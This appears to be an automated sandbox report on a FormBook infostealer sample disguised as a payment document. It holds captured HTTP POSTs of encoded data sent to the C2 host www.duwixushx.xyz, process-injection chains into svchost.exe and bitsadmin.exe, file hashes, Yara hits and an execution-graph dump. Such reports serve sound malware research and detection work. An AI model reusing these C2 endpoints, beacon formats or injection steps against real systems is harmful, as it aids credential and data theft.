                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=eosVKuLBekREJXGS/C+RAksCN84fp5m4GHVS8WWvL4xH7MPNXFCMduEZG9f2kpRN7n2Xcnb8K1fJVi5xHsPp5TrwEjYhMSyPIHlNBySRGdKpQDk9vFWylvu0QyGLoqlyqdqEBhTg4PRAm05d6MpZrjm1oiEPvDv3Dae9ZyLO3bO8MZjSP5FaKChrkELBa4YiDw0OUBrgt6IJ
                                                                Timestamp: Nov 27, 2024 08:57:07.093499899 CET | Bytes transferred: 289 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:06 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID: 42 | Source IP: 192.168.2.6 | Source Port: 50033 | Destination IP: 156.251.17.224 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:57:08.217842102 CET | Bytes transferred: 782 | Direction: OUT | Data: POST /q0vk/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Origin: http://www.duwixushx.xyz
                                                                Referer: http://www.duwixushx.xyz/q0vk/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=eosVKuLBekREPEOS9hGRBEsBI84fiZm8GHpS8XSFLKVH7s/NWECMeuEZOdf/55R87n61cmn8Kx3JVndxEdPq6jrudzYjDyyPIHlNByG7GcipQT09uhC9rPu3GCGL/6k1qdqyBgPO4NZAm1pd9Y1a8Tm/siFHpB6Qa5PcHTipuLmUAP+ITKF5YSBpkGTzaYYIBwMOGWnHiOtq8PJ5+6QY+dY+o5+4ddigUw==
                                                                Timestamp: Nov 27, 2024 08:57:09.753113985 CET | Bytes transferred: 289 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:09 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID: 43 | Source IP: 192.168.2.6 | Source Port: 50034 | Destination IP: 156.251.17.224 | Destination Port: 80 | PID: 4872 | Process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Timestamp: Nov 27, 2024 08:57:10.880908966 CET | Bytes transferred: 1795 | Direction: OUT | Data: POST /q0vk/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Origin: http://www.duwixushx.xyz
                                                                Referer: http://www.duwixushx.xyz/q0vk/
                                                                Cache-Control: no-cache
                                                                Content-Length: 1244
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Timestamp: Nov 27, 2024 08:57:12.400871038 CET | Bytes transferred: 289 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:12 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session ID: 44 | Source IP: 192.168.2.6 | Source Port: 50035 | Destination IP: 156.251.17.224 | Destination Port: 80
                                                                Timestamp: Nov 27, 2024 08:57:14.465193033 CET | Bytes transferred: 499 | Direction: OUT | Data: GET /q0vk/?Kp=6N8LUn6pGPW&6dr=TqE1JZ2PW3JWY2ub7wbyGmkAFORXr7+yOAYp2neLNqkwqfDGdEjMQdAOFdDc8sxV6WeqUhb2JmW0DlQMLtnU5QjuOQNkNi2JEE5AET6tFv2ZXVhBmCTejYrGfFb1t6Bzh+26W2w= HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.duwixushx.xyz
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Timestamp: Nov 27, 2024 08:57:16.023740053 CET | Bytes transferred: 289 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Wed, 27 Nov 2024 07:57:15 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                                                                Target ID:0
                                                                Start time:02:53:04
                                                                Start date:27/11/2024
                                                                Path:C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                                                                Imagebase:0x280000
                                                                File size:1'213'952 bytes
                                                                MD5 hash:07BD00D307952E993352E5311A7FDF90
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:2
                                                                Start time:02:53:05
                                                                Start date:27/11/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                                                                Imagebase:0x920000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:4
                                                                Start time:02:53:22
                                                                Start date:27/11/2024
                                                                Path:C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe"
                                                                Imagebase:0x910000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:5
                                                                Start time:02:53:24
                                                                Start date:27/11/2024
                                                                Path:C:\Windows\SysWOW64\bitsadmin.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\bitsadmin.exe"
                                                                Imagebase:0xc80000
                                                                File size:186'880 bytes
                                                                MD5 hash:F57A03FA0E654B393BB078D1C60695F3
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:moderate
                                                                Has exited:false

                                                                Target ID:6
                                                                Start time:02:53:37
                                                                Start date:27/11/2024
                                                                Path:C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe"
                                                                Imagebase:0x910000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:9
                                                                Start time:02:53:50
                                                                Start date:27/11/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff728280000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true


                                                                  Execution Graph

                                                                  Execution Coverage:3.9%
                                                                  Dynamic/Decrypted Code Coverage:1.3%
                                                                  Signature Coverage:8%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:58
93183->93186 93187 2ca58b 93183->93187 93188 2ca4fd 93183->93188 93184->93037 93185 29f4ea 48 API calls 93201 2ca54c Mailbox ___crtGetEnvironmentStringsW 93185->93201 93186->93185 93189 29f4ea 48 API calls 93187->93189 93190 29f4ea 48 API calls 93188->93190 93199 2ca51a 93188->93199 93189->93201 93190->93199 93191 2ca555 93195 29f4ea 48 API calls 93191->93195 93192 2ca545 93194 29f4ea 48 API calls 93192->93194 93193 29f4ea 48 API calls 93193->93184 93194->93201 93196 2ca55b 93195->93196 93202 2c9d2d 48 API calls 93196->93202 93198 2ca567 93203 29e65e 50 API calls 93198->93203 93199->93191 93199->93192 93199->93201 93201->93193 93202->93198 93203->93201 93240 28936c 93204->93240 93206 2df8ea 93231 2df92c Mailbox 93206->93231 93260 2e0567 93206->93260 93208 2dfb8b 93209 2dfcfa 93208->93209 93213 2dfb95 93208->93213 93323 2e0688 89 API calls Mailbox 93209->93323 93212 2dfd07 93212->93213 93215 2dfd13 93212->93215 93273 2df70a 93213->93273 93214 28936c 81 API calls 93235 2df984 Mailbox 93214->93235 93215->93231 93220 2dfbc9 93287 29ed18 93220->93287 93223 2dfbfd 93294 29c050 93223->93294 93224 2dfbe3 93293 2ccc5c 86 API calls 4 library calls 93224->93293 93227 2dfc14 93236 2dfc3e 93227->93236 93305 291b90 93227->93305 93228 2dfbee GetCurrentProcess TerminateProcess 93228->93223 93230 2dfd65 93230->93231 93237 2dfd7e FreeLibrary 93230->93237 93231->93042 93232 2dfc2d 93321 2e040f 105 API calls _free 93232->93321 93234 291b90 48 API calls 93234->93236 93235->93208 93235->93214 93235->93231 93291 2e29e8 48 API calls ___crtGetEnvironmentStringsW 93235->93291 93292 2dfda5 60 API calls 2 library calls 93235->93292 93236->93230 93236->93234 93322 28dcae 50 API calls Mailbox 93236->93322 93324 2e040f 105 API calls _free 93236->93324 93237->93231 93241 289384 93240->93241 93258 289380 93240->93258 93242 2f4cbd __i64tow 93241->93242 93243 2f4bbf 93241->93243 93244 289398 93241->93244 93250 2893b0 __itow Mailbox _wcscpy 93241->93250 93245 2f4bc8 93243->93245 93246 2f4ca5 
93243->93246 93325 2a172b 80 API calls 4 library calls 93244->93325 93245->93250 93251 2f4be7 93245->93251 93326 2a172b 80 API calls 4 library calls 93246->93326 93249 29f4ea 48 API calls 93252 2893ba 93249->93252 93250->93249 93253 29f4ea 48 API calls 93251->93253 93254 28ce19 48 API calls 93252->93254 93252->93258 93256 2f4c04 93253->93256 93254->93258 93255 29f4ea 48 API calls 93257 2f4c2a 93255->93257 93256->93255 93257->93258 93259 28ce19 48 API calls 93257->93259 93258->93206 93259->93258 93327 28bdfa 93260->93327 93262 2e0582 CharLowerBuffW 93333 2c1f11 93262->93333 93269 2e05d2 93346 28b18b 93269->93346 93271 2e05de Mailbox 93272 2e061a Mailbox 93271->93272 93350 2dfda5 60 API calls 2 library calls 93271->93350 93272->93235 93274 2df77a 93273->93274 93275 2df725 93273->93275 93279 2e0828 93274->93279 93276 29f4ea 48 API calls 93275->93276 93278 2df747 93276->93278 93277 29f4ea 48 API calls 93277->93278 93278->93274 93278->93277 93280 2e0a53 Mailbox 93279->93280 93286 2e084b _strcat _wcscpy __NMSG_WRITE 93279->93286 93280->93220 93281 28cf93 58 API calls 93281->93286 93282 28d286 48 API calls 93282->93286 93283 28936c 81 API calls 93283->93286 93284 2a395c 47 API calls _W_store_winword 93284->93286 93286->93280 93286->93281 93286->93282 93286->93283 93286->93284 93364 2c8035 50 API calls __NMSG_WRITE 93286->93364 93288 29ed2d 93287->93288 93289 29edc5 VirtualProtect 93288->93289 93290 29ed93 93288->93290 93289->93290 93290->93223 93290->93224 93291->93235 93292->93235 93293->93228 93295 29c064 93294->93295 93297 29c069 Mailbox 93294->93297 93365 29c1af 48 API calls 93295->93365 93303 29c077 93297->93303 93366 29c15c 48 API calls 93297->93366 93299 29f4ea 48 API calls 93300 29c108 93299->93300 93302 29f4ea 48 API calls 93300->93302 93301 29c152 93301->93227 93304 29c113 93302->93304 93303->93299 93303->93301 93304->93227 93304->93304 93306 291cf6 93305->93306 93309 291ba2 93305->93309 93306->93232 93307 291bae 93314 291bb9 93307->93314 93368 29c15c 48 API 
calls 93307->93368 93309->93307 93310 29f4ea 48 API calls 93309->93310 93311 2f49c4 93310->93311 93312 29f4ea 48 API calls 93311->93312 93320 2f49cf 93312->93320 93313 291c5d 93313->93232 93314->93313 93315 29f4ea 48 API calls 93314->93315 93316 291c9f 93315->93316 93317 291cb2 93316->93317 93367 282925 48 API calls 93316->93367 93317->93232 93319 29f4ea 48 API calls 93319->93320 93320->93307 93320->93319 93321->93236 93322->93236 93323->93212 93324->93236 93325->93250 93326->93250 93328 28be0d 93327->93328 93332 28be0a ___crtGetEnvironmentStringsW 93327->93332 93329 29f4ea 48 API calls 93328->93329 93330 28be17 93329->93330 93351 29ee75 93330->93351 93332->93262 93334 2c1f3b __NMSG_WRITE 93333->93334 93335 2c1f79 93334->93335 93336 2c1f6f 93334->93336 93338 2c1ffa 93334->93338 93335->93271 93340 28d7f7 93335->93340 93336->93335 93362 29d37a 60 API calls 93336->93362 93338->93335 93363 29d37a 60 API calls 93338->93363 93341 29f4ea 48 API calls 93340->93341 93342 28d818 93341->93342 93343 29f4ea 48 API calls 93342->93343 93344 28d826 93343->93344 93345 2869e9 48 API calls ___crtGetEnvironmentStringsW 93344->93345 93345->93269 93347 28b199 93346->93347 93348 28b1a2 ___crtGetEnvironmentStringsW 93346->93348 93347->93348 93349 28bdfa 48 API calls 93347->93349 93348->93271 93349->93348 93350->93272 93354 29f4ea __calloc_impl 93351->93354 93352 2a395c _W_store_winword 47 API calls 93352->93354 93353 29f50c 93353->93332 93354->93352 93354->93353 93355 29f50e std::exception::exception 93354->93355 93360 2a6805 RaiseException 93355->93360 93357 29f538 93361 2a673b 47 API calls _free 93357->93361 93359 29f54a 93359->93332 93360->93357 93361->93359 93362->93336 93363->93338 93364->93286 93365->93297 93366->93303 93367->93317 93368->93314 93370 28d654 93369->93370 93378 28d67e 93369->93378 93371 28d65b 93370->93371 93372 28d6c2 93370->93372 93373 28d6ab 93371->93373 93375 28d666 93371->93375 93372->93373 93402 29dce0 53 API calls 93372->93402 93373->93378 93401 29dce0 53 API 
calls 93373->93401 93400 28d9a0 53 API calls __cinit 93375->93400 93378->93077 93379->93077 93381 285197 93380->93381 93382 2f1ace 93381->93382 93383 28519f 93381->93383 93413 286b4a 93382->93413 93403 285130 93383->93403 93386 2f1adb __NMSG_WRITE 93388 29ee75 48 API calls 93386->93388 93387 2851aa 93390 28510d 93387->93390 93389 2f1b07 ___crtGetEnvironmentStringsW 93388->93389 93391 28511f 93390->93391 93392 2f1be7 93390->93392 93421 28b384 93391->93421 93430 2ba58f 48 API calls ___crtGetEnvironmentStringsW 93392->93430 93395 28512b 93395->93056 93396 2f1bf1 93397 286eed 48 API calls 93396->93397 93398 2f1bf9 Mailbox 93397->93398 93399->93057 93400->93378 93401->93378 93402->93373 93404 28513f __NMSG_WRITE 93403->93404 93405 2f1b27 93404->93405 93406 285151 93404->93406 93408 286b4a 48 API calls 93405->93408 93416 28bb85 93406->93416 93410 2f1b34 93408->93410 93409 28515e ___crtGetEnvironmentStringsW 93409->93387 93411 29ee75 48 API calls 93410->93411 93412 2f1b57 ___crtGetEnvironmentStringsW 93411->93412 93414 29f4ea 48 API calls 93413->93414 93415 286b54 93414->93415 93415->93386 93417 28bb9b 93416->93417 93420 28bb96 ___crtGetEnvironmentStringsW 93416->93420 93418 29ee75 48 API calls 93417->93418 93419 2f1b77 93417->93419 93418->93420 93420->93409 93422 28b392 93421->93422 93429 28b3c5 ___crtGetEnvironmentStringsW 93421->93429 93423 28b3b8 93422->93423 93424 28b3fd 93422->93424 93422->93429 93425 28bb85 48 API calls 93423->93425 93426 29f4ea 48 API calls 93424->93426 93425->93429 93427 28b407 93426->93427 93428 29f4ea 48 API calls 93427->93428 93428->93429 93429->93395 93430->93396 93431->93112 93432->93095 93433->93102 93435 29479f 93434->93435 93436 294637 93434->93436 93439 28ce19 48 API calls 93435->93439 93437 2f6e05 93436->93437 93438 294643 93436->93438 93440 2de822 331 API calls 93437->93440 93587 294300 331 API calls ___crtGetEnvironmentStringsW 93438->93587 93446 2946e4 Mailbox 93439->93446 93442 2f6e11 93440->93442 93443 294739 Mailbox 93442->93443 
93588 2ccc5c 86 API calls 4 library calls 93442->93588 93443->93112 93445 294659 93445->93442 93445->93443 93445->93446 93528 2cfa0c 93446->93528 93569 284252 93446->93569 93575 2d6ff0 93446->93575 93584 2c6524 93446->93584 93451->93107 93452->93110 94398 28bd30 93453->94398 93455 293267 93456 2932f8 93455->93456 93457 2f907a 93455->93457 93521 293628 93455->93521 94471 29c36b 86 API calls 93456->94471 94477 2ccc5c 86 API calls 4 library calls 93457->94477 93461 2f94df 93461->93521 94498 2ccc5c 86 API calls 4 library calls 93461->94498 93463 293313 93463->93461 93500 2934eb Mailbox ___crtGetEnvironmentStringsW 93463->93500 93463->93521 94403 282b7a 93463->94403 93467 2f926d 94486 2ccc5c 86 API calls 4 library calls 93467->94486 93468 2f909a 93470 28d645 53 API calls 93468->93470 93511 2f91fa 93468->93511 93469 28fe30 331 API calls 93472 2f9407 93469->93472 93473 2f910c 93470->93473 93472->93521 94491 28d6e9 93472->94491 93476 2f9114 93473->93476 93477 2f9220 93473->93477 93474 2933ce 93479 2f945e 93474->93479 93480 293465 93474->93480 93474->93500 93489 2f9128 93476->93489 93499 2f9152 93476->93499 94483 281caa 49 API calls 93477->94483 94496 2cc942 50 API calls 93479->94496 93485 29f4ea 48 API calls 93480->93485 93503 29346c 93485->93503 93486 2f9438 94495 2ccc5c 86 API calls 4 library calls 93486->94495 93487 2f923d 93492 2f925e 93487->93492 93493 2f9252 93487->93493 93488 28fe30 331 API calls 93488->93500 94478 2ccc5c 86 API calls 4 library calls 93489->94478 93491 29c3c3 48 API calls 93491->93500 94485 2ccc5c 86 API calls 4 library calls 93492->94485 94484 2ccc5c 86 API calls 4 library calls 93493->94484 93495 29351f 93512 286eed 48 API calls 93495->93512 93514 293540 93495->93514 93501 2f9177 93499->93501 93505 2f9195 93499->93505 93500->93467 93500->93468 93500->93486 93500->93488 93500->93491 93500->93495 93509 29f4ea 48 API calls 93500->93509 93513 2f9394 93500->93513 93517 2f93c5 93500->93517 93500->93521 94473 28d9a0 53 API calls __cinit 93500->94473 
94474 28d8c0 53 API calls 93500->94474 94475 29c2d6 48 API calls ___crtGetEnvironmentStringsW 93500->94475 94487 2dcda2 82 API calls Mailbox 93500->94487 94488 2c80e3 53 API calls 93500->94488 94489 28d764 55 API calls 93500->94489 94490 28dcae 50 API calls Mailbox 93500->94490 94479 2df320 331 API calls 93501->94479 93503->93495 94410 28e8d0 93503->94410 93507 2f918b 93505->93507 94480 2df5ee 331 API calls 93505->94480 93507->93521 94481 29c2d6 48 API calls ___crtGetEnvironmentStringsW 93507->94481 93509->93500 94482 2ccc5c 86 API calls 4 library calls 93511->94482 93512->93514 93515 29f4ea 48 API calls 93513->93515 93518 2f94b0 93514->93518 93520 293585 93514->93520 93514->93521 93515->93517 93517->93469 94497 28dcae 50 API calls Mailbox 93518->94497 93520->93461 93520->93521 93522 293615 93520->93522 93524 293635 Mailbox 93521->93524 94476 2ccc5c 86 API calls 4 library calls 93521->94476 94472 28dcae 50 API calls Mailbox 93522->94472 93524->93112 93525->93122 93526->93124 93527->93128 93529 2cfa1c __ftell_nolock 93528->93529 93530 2cfa44 93529->93530 93672 28d286 48 API calls 93529->93672 93532 28936c 81 API calls 93530->93532 93533 2cfa5e 93532->93533 93534 2cfb68 93533->93534 93535 2cfa80 93533->93535 93544 2cfb92 93533->93544 93589 2841a9 93534->93589 93537 28936c 81 API calls 93535->93537 93542 2cfa8c _wcscpy _wcschr 93537->93542 93539 2cfb8e 93541 28936c 81 API calls 93539->93541 93539->93544 93540 2841a9 136 API calls 93540->93539 93543 2cfbc7 93541->93543 93548 2cfab0 _wcscat _wcscpy 93542->93548 93552 2cfade _wcscat 93542->93552 93613 2a1dfc 93543->93613 93544->93443 93546 28936c 81 API calls 93547 2cfafc _wcscpy 93546->93547 93673 2c72cb GetFileAttributesW 93547->93673 93550 28936c 81 API calls 93548->93550 93550->93552 93551 2cfbeb _wcscat _wcscpy 93557 28936c 81 API calls 93551->93557 93552->93546 93553 2cfb1c __NMSG_WRITE 93553->93544 93554 28936c 81 API calls 93553->93554 93555 2cfb48 93554->93555 93674 2c60dd 77 API calls 4 library calls 
93555->93674 93558 2cfc82 93557->93558 93616 2c690b 93558->93616 93559 2cfb5c 93559->93544 93561 2cfca2 93562 2c6524 3 API calls 93561->93562 93563 2cfcb1 93562->93563 93564 28936c 81 API calls 93563->93564 93566 2cfce2 93563->93566 93565 2cfccb 93564->93565 93622 2cbfa4 93565->93622 93568 284252 84 API calls 93566->93568 93568->93544 93570 28425c 93569->93570 93571 284263 93569->93571 93572 2a35e4 __fcloseall 83 API calls 93570->93572 93573 284272 93571->93573 93574 284283 FreeLibrary 93571->93574 93572->93571 93573->93443 93574->93573 93576 28936c 81 API calls 93575->93576 93577 2d702a 93576->93577 94345 28b470 93577->94345 93579 2d703a 93580 2d705f 93579->93580 93581 28fe30 331 API calls 93579->93581 93583 2d7063 93580->93583 94373 28cdb9 48 API calls 93580->94373 93581->93580 93583->93443 94394 2c6ca9 GetFileAttributesW 93584->94394 93587->93445 93588->93443 93675 284214 93589->93675 93594 2f4f73 93596 284252 84 API calls 93594->93596 93595 2841d4 LoadLibraryExW 93685 284291 93595->93685 93598 2f4f7a 93596->93598 93600 284291 3 API calls 93598->93600 93602 2f4f82 93600->93602 93711 2844ed 93602->93711 93603 2841fb 93603->93602 93604 284207 93603->93604 93606 284252 84 API calls 93604->93606 93607 28420c 93606->93607 93607->93539 93607->93540 93610 2f4fa9 93717 284950 93610->93717 94017 2a1e46 93613->94017 93617 2c6918 _wcschr __ftell_nolock 93616->93617 93618 2a1dfc __wsplitpath 47 API calls 93617->93618 93621 2c692e _wcscat _wcscpy 93617->93621 93619 2c695d 93618->93619 93620 2a1dfc __wsplitpath 47 API calls 93619->93620 93620->93621 93621->93561 93623 2cbfb1 __ftell_nolock 93622->93623 93624 29f4ea 48 API calls 93623->93624 93625 2cc00e 93624->93625 93626 2847b7 48 API calls 93625->93626 93627 2cc018 93626->93627 94043 2cbdb4 93627->94043 93629 2cc023 93630 284517 83 API calls 93629->93630 93631 2cc036 _wcscmp 93630->93631 93632 2cc05a 93631->93632 93633 2cc107 93631->93633 94076 2cc56d 94 API calls 2 library calls 93632->94076 94077 2cc56d 94 API calls 2 
library calls 93633->94077 93636 2cc05f 93637 2a1dfc __wsplitpath 47 API calls 93636->93637 93640 2cc110 93636->93640 93642 2cc088 _wcscat _wcscpy 93637->93642 93638 2844ed 64 API calls 93639 2cc12c 93638->93639 93641 2844ed 64 API calls 93639->93641 93640->93566 93643 2cc13c 93641->93643 93645 2a1dfc __wsplitpath 47 API calls 93642->93645 93644 2844ed 64 API calls 93643->93644 93646 2cc157 93644->93646 93650 2cc0d3 _wcscat 93645->93650 93647 2844ed 64 API calls 93646->93647 93648 2cc167 93647->93648 93649 2844ed 64 API calls 93648->93649 93651 2cc182 93649->93651 93650->93638 93650->93640 93652 2844ed 64 API calls 93651->93652 93653 2cc192 93652->93653 93654 2844ed 64 API calls 93653->93654 93655 2cc1a2 93654->93655 93656 2844ed 64 API calls 93655->93656 93657 2cc1b2 93656->93657 94046 2cc71a GetTempPathW GetTempFileNameW 93657->94046 93659 2cc1be 93660 2a3499 117 API calls 93659->93660 93667 2cc1cf 93660->93667 93661 2cc289 94060 2a35e4 93661->94060 93663 2cc294 93663->93640 93665 2cc342 CopyFileW 93663->93665 93668 2cc2b8 93663->93668 93664 2844ed 64 API calls 93664->93667 93665->93640 93666 2cc32d 93665->93666 93666->93640 94073 2cc6d9 CreateFileW 93666->94073 93667->93640 93667->93661 93667->93664 94047 2a2aae 93667->94047 94078 2cb965 118 API calls __fcloseall 93668->94078 93672->93530 93673->93553 93674->93559 93722 284339 93675->93722 93679 2841bb 93682 2a3499 93679->93682 93680 284244 FreeLibrary 93680->93679 93681 28423c 93681->93679 93681->93680 93730 2a34ae 93682->93730 93684 2841c8 93684->93594 93684->93595 93933 2842e4 93685->93933 93689 2841ec 93692 284380 93689->93692 93690 2842c1 FreeLibrary 93690->93689 93691 2842b8 93691->93689 93691->93690 93693 29f4ea 48 API calls 93692->93693 93694 284395 93693->93694 93941 2847b7 93694->93941 93696 2843a1 ___crtGetEnvironmentStringsW 93697 2843dc 93696->93697 93698 284499 93696->93698 93699 2844d1 93696->93699 93700 284950 57 API calls 93697->93700 93944 28406b CreateStreamOnHGlobal 93698->93944 93955 2cc750 
93 API calls 93699->93955 93704 2843e5 93700->93704 93703 2844ed 64 API calls 93703->93704 93704->93703 93705 284479 93704->93705 93707 2f4ed7 93704->93707 93950 284517 93704->93950 93705->93603 93708 284517 83 API calls 93707->93708 93709 2f4eeb 93708->93709 93710 2844ed 64 API calls 93709->93710 93710->93705 93712 2844ff 93711->93712 93713 2f4fc0 93711->93713 93979 2a381e 93712->93979 93716 2cbf5a GetSystemTimeAsFileTime 93716->93610 93718 28495f 93717->93718 93719 2f5002 93717->93719 93999 2a3e65 93718->93999 93721 284967 93726 28434b 93722->93726 93725 284321 LoadLibraryA GetProcAddress 93725->93681 93727 28422f 93726->93727 93728 284354 LoadLibraryA 93726->93728 93727->93681 93727->93725 93728->93727 93729 284365 GetProcAddress 93728->93729 93729->93727 93732 2a34ba __getstream 93730->93732 93731 2a34cd 93778 2a7c0e 47 API calls __getptd_noexit 93731->93778 93732->93731 93734 2a34fe 93732->93734 93749 2ae4c8 93734->93749 93735 2a34d2 93779 2a6e10 8 API calls __cftoe2_l 93735->93779 93738 2a3503 93739 2a3519 93738->93739 93740 2a350c 93738->93740 93742 2a3543 93739->93742 93743 2a3523 93739->93743 93780 2a7c0e 47 API calls __getptd_noexit 93740->93780 93763 2ae5e0 93742->93763 93781 2a7c0e 47 API calls __getptd_noexit 93743->93781 93745 2a34dd @_EH4_CallFilterFunc@8 __getstream 93745->93684 93750 2ae4d4 __getstream 93749->93750 93783 2a7cf4 93750->93783 93752 2ae559 93819 2a69d0 47 API calls 